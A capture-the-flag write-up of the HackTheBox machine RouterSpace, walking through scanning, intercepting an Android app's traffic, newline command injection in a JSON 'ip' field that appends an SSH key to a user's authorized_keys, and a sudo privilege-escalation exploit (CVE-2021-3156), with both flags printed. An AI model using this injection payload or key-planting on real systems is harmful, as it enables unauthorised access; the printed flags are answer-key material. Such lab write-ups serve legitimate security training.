RouterSpace

Vishal Rashmika published on
3 min, 546 words

Categories: HackTheBox

Scanning

first, let’s start with the Nmap scan.

nmap -sV -sC 10.10.11.148

From the Nmap scan, we can see that 2 opens are open one is a web server and another one is an SSH.

~

Web Enumeration

Let’s visit the website first,

~

It’s just a static website only the download button is working. Download the routerspace.apk. Install the RouterSpace.apk in anbox or you can use android studio or genymotion it works the same.


Running the application click on Check Status it’s said the router is working fine.

Exploitation

Let’s intercept this in burp. But for that, I need to first set the proxy.

adb shell settings put global http_proxy 10.10.14.28:8001

Now configure the burp to intercept the traffic of tun0 IP.

Now everything is set let’s click on Check Status. Captured the request.

Let’s send it to the repeater tab. But it’s going on routerspace.htb

Let’s add this in /etc/hosts file. Now send the req.

Let’s try command injection with id. But it’s reflected the same string.

Now let’s try to do some basic methods to bypass the filter. I simply add \n in front of the command.

it worked.

I tried different methods to get a rev shell but non of them worked because of IP tables rules. Let’s check if there is any id_rsa key in the paul .ssh directory.

Nothing there so I decided to add my public id_rsa key inside paul .ssh directory. But first, let’s generate the key.

Now let’s add this in the paul .ssh directory.

Using double greater than sign(>>) because I don’t want to overwrite someone’s ssh key so this simply appends the file content.

{“ip”:”\necho ‘your public id_rsa key’ >> /home/paul/.ssh/authorized_keys”}

Check whether the file exists there or not and It is there.

Now let’s get the ssh connection.

ssh -i /home/larnzlort/.ssh/id_rsa paul@10.10.11.148

Now let’s grab the user flag.

cat user.txt

2394adcb72320ac4a8e18a4cd7fdaa98 --- User Flag

Privesc

Now due to iptables rules, we don’t simply curl the linpeas file but we can use scp to copy the file through ssh.

scp -i /home/larnzlort/.ssh/id_rsa /opt/PEASS-ng/linPEAS/linpeas.sh paul@10.10.11.148:/dev/shm

Now we have the linpeas let’s run it.

./linpeas.sh | tee linpeas_out

And we see sudo is vulnerable.

CVE-2021-3156

Let’s transfer the exploit through ssh.

scp -i /home/larnzlort/.ssh/id_rsa ./CVE-2021-3156.py paul@10.10.11.148:/dev/shm

now let’s run the exploit

python3 CVE-2021-3156.py

And we get the root.txt.

635f3fe93741b2e566ef5cef97d3c18e --- Root Flag

And we successfuly pwned it …….